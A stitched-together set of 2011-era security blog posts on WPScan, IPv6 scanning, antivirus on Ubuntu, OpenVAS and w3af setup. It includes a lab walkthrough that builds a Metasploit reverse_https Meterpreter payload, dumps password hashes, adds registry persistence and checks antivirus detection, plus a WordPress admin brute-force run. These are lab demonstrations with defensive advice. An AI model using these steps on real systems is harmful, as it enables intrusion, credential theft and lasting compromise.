The scan uses techniques that include brute forcing the plugins directory of a wordpress installation to find installed plugins. This is an accurate way to find plugins and can even pinpoint plugins that are disabled within the site but still installed in the wp-content/plugins directory and possibly a security risk.

Features of the active WPScan component include:

• Username discovery; with usernames an attacker can then start brute forcing account passwords
• Enhanced version enumeration, from both the meta generator tag and client side files
• Vulnerability identification, comparing current version with known vulnerabilities
• Timbthumb file discovery – this is a vulnerability affecting hundreds of thousands of WordPress sites
• Plugin enumeration (over 2000 plugins tested)
• Plugin vulnerability identification (from plugin name)
• Test for directory indexing on any discovered plugins

Due to the aggressive nature of the plugin and username discovery techniques we have decided to make the WPScan component of our online scanner available only to members.

If you would like to run WPScan from your own installation there are excellent getting started guides on the google-code site and in the README file. Getting it installed and running on Ubuntu or Back-track does not take much effort; so fire up your Linux distro and start testing.

Did you known that wordpress runs more than 11% of the worlds top web sites.

It is important to understand what ports are open and listening on your perimeter network or hosted Internet servers. With the updated tool you can now quickly determine what ports are listening on both your IPv4 based address and your IPv6 address. As people move towards IPv6 (will 2012 be the year of IPv6?), it is necessary to ensure that network protection devices and software are configured and capable of protecting both IPv4 and IPv6 traffic.

An AAAA DNS record has been added to our main site, and if you try our powered by tool (part of the IP Tools), you will be able to see that we are serving pages to both IPv4 and IPv6 addresses.

If 2012 is going to be year of IPv6 we are ready to go.

Now for a quick background check; Ubuntu is stable, easy to use and a rock solid desktop. I have been using it since the Warty Warthog (Ubuntu 4.10 ~ 2004), it runs on all my systems: home server, virtual servers and laptops.

Back to the question:

An Ubuntu Virus?

, the short answer is no there is no significant threats to an Ubuntu system from a virus. There are cases where you may want to run it on a desktop or server but for the majority of users, you do not need antivirus on Ubuntu.

Keep in mind that while you don’t need anti-virus does not mean you don’t need to be security aware.

Members of the Ubuntu community have put together an excellent introduction to Security on Ubuntu Linux. There are also free firewall test and other scanning tools available to ensure your network is correctly configured.

Once you have familiarized yourself with the concepts and information in the guide; if you are really keen (or paranoid) I would suggest a security addition to your systems, it is known as Host Based Intrusion Detection system. My HIDS agent of choice is ossec.net, it will not detect a virus as such but it does alert you to anomalous behavior on the system by examining system logs and watching the file system. If you chose to run OSSEC you probably do not need to run rkhunter and chkrootkit that are mentioned on the Basic Security Wiki page.

This old install guide I did for OSSEC on Ubuntu has the basic steps in getting it up and running.

Finally if you have a need for running anti-virus on Ubuntu, there is a good article on the Ubuntu wiki that has links to the popular and free antivirus software available (such as AVG, Avast, Avira) and the open source clamAV.

Hit the link for the full list – SQL Injection Scanners

First of course there is the HackerTarget.com scan, externally facing and coming in at a fairly high level. The system downloads some of your pages, does analysis, checks a few additional links and gives you a tidy little report detailing any security issues discovered.

Our scan does not perform brute forcing of accounts, passwords or plugins. Brute Forcing is more appropriate in a targeted pen-test or black-box vulnerability assessment.

Simply put brute forcing for:

Additionally username’s can also be gathered through some WordPress themes, RSS feeds, and author page URI’s such as /blog/author/admin/.

These tools and scripts that can be utilized in your Penetration Testing of WordPress.

Metasploit has a module for enumerating usernames and brute forcing passwords. It is solid and convenient; everyone has Metasploit installed… don’t they?

An NSE (nmap scripting engine) script was released for Nmap that does plugin brute forcing.

Just in the last few days a new tool hit the tubes wpscan. Still under development it does a few different checks including brute forcing for accounts.

All the tools referenced above are dedicated towards external testing of wordpress installations. There are other options that involve installation of plugins into the wordpress installations for deeper monitoring.

Let’s first look at a common locked down Corporate Network. Then we will show how pwnage is not difficult with this new Payload.

Lab Setup
I am simulating the network with 3 virtual guest machines and the host Ubuntu Linux system. 1 virtual guest will act as the Firewall and Proxy, while the 2 other guests are Windows clients that will be the targets. The laptop host in this lab is the attacker on the Internet.

On the virtual gateway Smoothwall box I configured DHCP, Proxy, Snort and Firewall Rules to block outbound traffic. Only opened 22 (for sftp) and proxy port (tcp 800). This has simulated the corporate network in the diagram above.

Now build the malicious executable.

On the Laptop I am running Metasploit Framework 3.7.2.

/opt/framework-3.7.2/msf3# msfvenom -p windows/meterpreter/reverse_https -f exe LHOST=192.168.56.1 LPORT=443 > evil_https.exe

Now to setup the listener on the laptop.

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(handler) > set SessionCommunicationTimeout 0
SessionCommunicationTimeout => 0
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://192.168.56.1:443/
[*] Starting the payload handler…
msf exploit(handler) >

Use scp or whatever to copy evil_https.exe to the Windows XP system and then run it.

Back in the console on the Linux host we see.

[*] 192.168.56.101:43681 Request received for /INITM…
[*] 192.168.56.101:43681 Staging connection for target /INITM received…
[*] Patched transport at offset 486516…
[*] Patched URL at offset 486248…
[*] Patched Expiration Timeout at offset 641856…
[*] Patched Communication Timeout at offset 641860…
[*] Meterpreter session 1 opened (192.168.56.1:443 -> 192.168.56.101:43681) at Fri Jul 15 12:09:01 +1000 2011

meterpreter > hashdump
Administrator:500:aad3b435b51404eexad3e435t51404ee:31d6cse0dfe6ae931b73c5ed7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:e4c292ecc2957ce7fb630fc6166aa510:235f3388ca0a29e8494d047362de1507:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c77865e3c4b213df710209775e335e62:::

Evil_https.exe connected to the listener on Laptop. All communication took place over the proxy. Looking at netstat on the client XP machine we only see HTTPS connections to the proxy. A very normal type of connection.

How solid is the connection? Lets reboot the smoothwall proxy host.

Meterpreter session appears to hang during the reboot. Type a command; wait…. success!! The session over the proxy using HTTPS is re-established. I did not have to re-run executable.

meterpreter > ipconfig

AMD PCNET Family PCI Ethernet Adapter – Packet Scheduler Miniport
Hardware MAC: 08:00:27:70:63:0d
IP Address : 10.10.10.199
Netmask : 255.255.255.0

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0

meterpreter > screenshot
Screenshot saved to: /opt/framework-3.7.2/msf3/bFjkdUHa.jpeg

Lets improve things and make it persistent on the client so that when the corporate user takes his laptop home we get a session from home, and then another session the next morning from the corporate network.

These commands manipulate the registry and will add evil_https.exe to the start-up programs on the client XP machine.

meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run

Values (1):

VBoxTray

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v evil -d ‘C:\windows\evil_https.exe’
Successful set evil.

meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run

Values (3):

VBoxTray
evil

meterpreter >

Next I rebooted Windows XP and we received a new session on the listener after the reboot.

msf exploit(handler) >
[*] 192.168.56.101:55182 Request received for /INITM…
[*] 192.168.56.101:55182 Staging connection for target /INITM received…
[*] Patched transport at offset 486516…
[*] Patched URL at offset 486248…
[*] Patched Expiration Timeout at offset 641856…
[*] Patched Communication Timeout at offset 641860…
[*] Meterpreter session 2 opened (192.168.56.1:443 -> 192.168.56.101:55182) at Fri Jul 15 12:43:31 +1000 2011

Nice, now as mentioned in the release blog post it should also be possible to quit out of the metasploit console and re-establish a session without touching the WinXP box.

I quit from Metasploit Console. Went and had some lunch.

Ok, after a great lunch I fired up the msfconsole using the same settings as before. I do not touch the XP machine.

/opt/framework-3.7.2/msf3# ./msfconsole

| | _) |
__ `__ \ _ \ __| _` | __| __ \ | _ \ | __|
| | | __/ | ( |\__ \ | | | ( | | |
_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
_|

=[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ — –=[ 711 exploits - 360 auxiliary - 58 post
+ -- --=[ 225 payloads - 27 encoders - 8 nops
=[ svn r13116 updated 8 days ago (2011.07.07)

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set SessionCommunicationTimeout 0
SessionCommunicationTimeout => 0
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://192.168.56.1:443/
[*] Starting the payload handler…
msf exploit(handler) >
[*] 192.168.56.101:40252 Request received for /CONN_pJGJgpWGAzUlDCTZ/…
[*] Incoming orphaned session CONN_pJGJgpWGAzUlDCTZ, reattaching…
[*] Meterpreter session 1 opened (192.168.56.1:443 -> 192.168.56.101:40252) at Fri Jul 15 13:57:34 +1000 2011

Wow, that is nice the client machine reconnected. This new payload is stable and undeniably dangerous.

Righto, same deal on fully patched Windows7 Enterprise with “Work Network Settings” (no Anti-Virus).

meterpreter >
[*] 192.168.56.101:50910 Request received for /INITM…
[*] 192.168.56.101:50910 Staging connection for target /INITM received…
[*] Patched transport at offset 486516…
[*] Patched URL at offset 486248…
[*] Patched Expiration Timeout at offset 641856…
[*] Patched Communication Timeout at offset 641860…
[*] Meterpreter session 2 opened (192.168.56.1:443 -> 192.168.56.101:50910) at Fri Jul 15 14:22:07 +1000 2011

meterpreter >
msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2…

meterpreter > ipconfig

Intel(R) PRO/1000 MT Desktop Adapter
Hardware MAC: 08:00:27:ef:f4:61
IP Address : 10.10.10.198
Netmask : 255.255.255.0

meterpreter > sysinfo
System Language : en_AU
OS : Windows 7 (Build 7600).
Computer : TEST-VM2
Architecture : x86
Meterpreter : x86/win32
meterpreter > run getcountermeasure
[*] Running Getcountermeasure on the target…
[*] Checking for contermeasures…
[*] Getting Windows Built in Firewall configuration…
[*]
[*] Domain profile configuration:
[*] ——————————————————————-
[*] Operational mode = Enable
[*] Exception mode = Enable
[*]
[*] Standard profile configuration (current):
[*] ——————————————————————-
[*] Operational mode = Enable
[*] Exception mode = Enable
[*]
[*] Checking DEP Support Policy…
meterpreter >

Booya!

Note that both the client systems were not running any Anti-virus. The executable may have been blocked if they were.

Lets check virustotal.com. Remember this is a vanilla payload from msfvenom. I have not used exe templates or attempted additional tricks to avoid Anti-virus detection.

Quite a few anti-virus programs detected the executable as dangerous (27 out of 43). Let’s have a closer look at corporate favourites like Symantec and Trend.

Symantec and Trend did not detect the executable as dangerous.

By understanding the attack you can then start to discuss and find effective ways to defend against these types of targeted attacks.

CHANGELOG for 6.4
=================
* Update SIP module to extract and use external IP addr return from server error to bypass NAT
* Update SIP module to use SASL lib
* Update email modules to check clear mode when TLS mode failed
* Update Oracle Listener module to work with Oracle DB 9.2
* Update LDAP module to support Windows 2008 active directory simple auth
* Fix to the connection adaptation engine which would loose planned attempts
* Fix make script for CentOS, reported by ya0wei
* Print error when a service limits connections and few pairs have to be tested
* Improved Mysql module to only init/close when needed
* Added patch from the FreeBSD maintainers
* Module usage help does not need a target to be specified anymore
* configure script now honors /etc/ld.so.conf.d/ directory

Hydra 6.4 Released

Lets get going, we are going to build a server version from source on Ubuntu 10.04 LTS, will give 11.04 a go in the near future. These packages should get you going.

apt-get install build-essential cmake doxygen uuid libgpgme11 libgpgme11-dev libpcap0.8-dev libpcap0.8 uuid-dev pkg-config libglib2.0* autoconf libgnutls-dev bison sqlite3 libsqlite3-dev xsltproc libxslt1-dev libmicrohttpd-dev xmltoman

Information for getting the wmi library built is here, the following is a fast summary.

wget http://www.openvas.org/download/wmi/wmi-1.3.14.tar.bz2

tar xjvf wmi-1.3.14.tar.bz2

To enable the WMI integration in OpenVAS, a patch needs to be applied to the
source you just downloaded.

wget http://www.openvas.org/download/wmi/openvas-wmi-1.3.14.patch

Copy the patch to the wmi-1.3.14 directory you just created and apply the patch
with the following command:

$ patch -p1 < openvas-wmi-1.3.14.patch

In the wmi-1.3.14 directory, execute the following commands:
cd Samba/source
./autogen.sh
./configure
make proto all
make libraries

bash install-libwmiclient.sh

Now we should be good to go on the main application building.

wget http://wald.intevation.org/frs/download.php/862/openvas-scanner-3.2.3.tar.gz
wget http://wald.intevation.org/frs/download.php/871/openvas-manager-2.0.4.tar.gz
wget http://wald.intevation.org/frs/download.php/853/openvas-administrator-1.1.1.tar.gz
wget http://wald.intevation.org/frs/download.php/857/greenbone-security-assistant-2.0.1.tar.gz
wget http://wald.intevation.org/frs/download.php/860/gsd-1.1.1.tar.gz
wget http://wald.intevation.org/frs/download.php/851/openvas-cli-1.1.2.tar.gz

tar zxvf openvas-cli-1.1.2.tar.gz
tar zxvf openvas-libraries-4.0.5.tar.gz
tar zxvf openvas-manager-2.0.4.tar.gz
tar zxvf openvas-scanner-3.2.3.tar.gz
tar zxvf openvas-administrator-1.1.1.tar.gz

cd openvas-libraries-4.0.5
cmake .
make
make install

cd openvas-scanner-3.2.3
cmake .
make
make install

cd openvas-cli-1.1.2
cmake .
make
make install

cd openvas-administrator-1.1.1
cmake .
make
make install

cd greenbone-security-assistant-2.0.1
cmake .
make
make install

ldconfig

Run the initial commands build your certificate and create an openvas user.

openvas-mkcert
openvas-adduser

openvas-nvt-sync
< plugins scroll by -- snip >
[i] Download complete
[i] Checking dir: ok
[i] Checking MD5 checksum: ok

openvassd
Loading the plugins… 8058 (out of 21431)

Looking good so far.

There are a lot of components to this installation. There is a handy script that checks your OpenVas configuration for problems. Download it, save as openvas-check.sh and run it.

wget http://wald.intevation.org/plugins/scmsvn/viewcvs.php/*checkout*/trunk/tools/openvas-check-setup?root=openvas -O openvas-check.sh

./openvas-check.sh

openvas-check-setup 2.0.6
Test completeness and readiness of OpenVAS-4

Please report us any non-detected problems and
help us to improve this check routine:

http://lists.wald.intevation.org/mailman/listinfo/openvas-discuss

Send us the log-file (/tmp/openvas-check-setup.log) to help analyze the problem.

Use the parameter –server to skip checks for client tools
like GSD and OpenVAS-CLI.

Step 1: Checking OpenVAS Scanner …
OK: OpenVAS Scanner is present in version 3.2.3.
OK: OpenVAS Scanner CA Certificate is present as /usr/local/var/lib/openvas/CA/cacert.pem.
OK: NVT collection in /usr/local/var/lib/openvas/plugins contains 21431 NVTs.
Step 2: Checking OpenVAS Manager …
OK: OpenVAS Manager is present in version 2.0.4.
OK: OpenVAS Manager client certificate is present as /usr/local/var/lib/openvas/CA/clientcert.pem.
ERROR: No OpenVAS Manager database found. (Tried: /usr/local/var/lib/openvas/mgr/tasks.db)
FIX: Run ‘openvasmd –rebuild’ while OpenVAS Scanner is running.

ERROR: Your OpenVAS-4 installation is not yet complete!

Please follow the instructions marked with FIX above and run this
script again.

If you think this result is wrong, please report your observation
and help us to improve this check routine:

http://lists.wald.intevation.org/mailman/listinfo/openvas-discuss

Please attach the log-file (/tmp/openvas-check-setup.log) to help us analyze the problem.

Notice how the check script detects the problem and prompts you with a fix.

openvasmd –rebuild

We still have an error in openvas-check.sh results, but this is because we have not built the GSD (Greenbone security desktop). We are not building the desktop client as this is a remote server.

openvasd
gsad
openvasmd

This should start up the services. The Greenbone Security Assistant runs on 80 and 443. You can use command line options force ssl. I have done some initial testing and have to say its impressive. Fast, responsive and intuitive – unlike Nessus and its flash based web gui that I find to be clunky and difficult to manage.

Version 4.0 of OpenVas is good at this stage. I will definitely have to do more testing and look at migrating our version 3 based online scanning solution to version 4.

Poor WordPress password security is an ongoing issue, the purpose of this post is to highlight how easy it is to break into wordpress admin accounts that have weak passwords.

Metasploit Framework is an open source penetration testing application that has modules for the explicit purpose of breaking into systems and applications. This is the software we will use to demonstrate poor WordPress security.

Did you know with the wordpress admin account you not only lose control of your blog but on many hosts the attacker can then run code on the server with the rights of the web hosting account or web server. With the ability to run commands locally, full server root compromise is the next step.

I will be performing the password audit against a local VirtualBox running WordPress. This sort of activity is illegal in most places if used against systems that you do not have explicit permission to test.

First I will download and install the Metasploit Framework into my Ubuntu Linux 11.04 Desktop system. This will be a minimal install of Metasploit with the mini installer and minimal packages to get this module running.

apt-get install ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby libreadline-ruby irb ri rubygems

wget http://updates.metasploit.com/data/releases/framework-3.7.1-linux-x64-mini.run

wget http://downloads.skullsecurity.org/passwords/500-worst-passwords.txt

chmod +x framework-3.7.1-linux-x64-mini.run

sudo ./framework-3.7.1-linux-x64-mini.run

Since I am on my Ubuntu Desktop a pretty rapid7 installer pops up and it is a matter of clicking through the installer.

./msfconsole

# # ###### ##### ## #### ##### # #### # #####
## ## # # # # # # # # # # # #
# ## # ##### # # # #### # # # # # # #
# # # # ###### # ##### # # # # #
# # # # # # # # # # # # # #
# # ###### # # # #### # ###### #### # #

=[ metasploit v3.7.1-release [core:3.7 api:1.0]
+ — –=[ 687 exploits - 357 auxiliary - 39 post
+ -- --=[ 217 payloads - 27 encoders - 8 nops

msf > show auxiliary

msf > use scanner/http/wordpress_login_enum

msf auxiliary(wordpress_login_enum) >

msf auxiliary(wordpress_login_enum) > show options

Module options (auxiliary/scanner/http/wordpress_login_enum):

Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE true yes Perform brute force authentication
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no Use a proxy chain
RHOSTS yes The target address range or CIDR identifier
RPORT 80 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
URI /wp-login.php no Define the path to the wp-login.php file
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS true no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VALIDATE_USERS true yes Enumerate usernames
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host

msf auxiliary(wordpress_login_enum) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf auxiliary(wordpress_login_enum) > set USERNAME admin
USERNAME => admin
msf auxiliary(wordpress_login_enum) > set PASS_FILE /home/test/500-worst-passwords.txt
PASS_FILE => /home/test/500-worst-passwords.txt
msf auxiliary(wordpress_login_enum) > exploit

[*] http://192.168.56.101:80/wp-login.php – WordPress Enumeration – Running User Enumeration
[*] http://192.168.56.101:80/wp-login.php – WordPress Enumeration – Checking Username:’admin’
[+] http://192.168.56.101:80/wp-login.php – WordPress Enumeration- Username: ‘admin’ – is VALID
[+] http://192.168.56.101:80/wp-login.php – WordPress Enumeration – Found 1 valid user
[*] http://192.168.56.101:80/wp-login.php – WordPress Brute Force – Running Bruteforce
[*] http://192.168.56.101:80/wp-login.php – WordPress Brute Force – Skipping all but 1 valid user
[*] http://192.168.56.101:80/wp-login.php – WordPress Brute Force – Trying username:’admin’ with password:”
[-] http://192.168.56.101:80/wp-login.php – WordPress Brute Force – Failed to login as ‘admin’

<-------------- SNIP -------------------->

[-] http://192.168.56.101:80/wp-login.php – WordPress Brute Force – Failed to login as ‘admin’
[*] http://192.168.56.101:80/wp-login.php – WordPress Brute Force – Trying username:’admin’ with password:’albert’
[-] http://192.168.56.101:80/wp-login.php – WordPress Brute Force – Failed to login as ‘admin’
[*] http://192.168.56.101:80/wp-login.php – WordPress Brute Force – Trying username:’admin’ with password:’toor’
[+] http://192.168.56.101:80/wp-login.php – WordPress Brute Force – SUCCESSFUL login for ‘admin’ : ‘toor’
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Password has been found! Testing these 500 passwords was fast. Obviously over the speed will depend on the network link and the server speed.

One of the things that makes breaking wordpress accounts easy is that the username can be enumerated from the admin login screen.

It is important to rename the admin account on installations of wordpress and to use a complicated password of adequate length. I have shown above how easy it is to guess hundreds of passwords very quickly.

More details on securing your system can be found at WordPress.org, understanding what is running on your wordpress blog and other security risks is an important step in maintaining a secure system. HackerTarget.com has a free WordPress Security Scan that can be used to check some of these issues.

Details on the Metasploit Module used for this testing can be found here

To fire it up on Ubuntu only a couple of steps are required:

Download the latest version from here: http://sourceforge.net/projects/w3af/files/
sudo apt-get install python-nltk python-soappy python-lxml python-svn python-scapy graphviz

tar jxvf w3af-1.0-stable.tar.bz2
./w3af_gui

The first thing to notice is the shiny new splash screen highlighting the new owner of the project that being Rapid7.

A notice that I don’t have the latest update appears, so auto update is performed after confirmation.

Following some local testing of random wordpress plugins in a turnkey linux virtualbox host I found the w3af framework to be much improved in terms of stability and speed. This is a welcome improvement as previously python traces and broken scans was annoying enough to make it unusable unless stepping through and performing one or two audit plugins at a time.

Further exploration is required, as the potential for an excellent open source web application testing framework has always been there. I expect to see closer integration between Metasploit and w3af in future releases.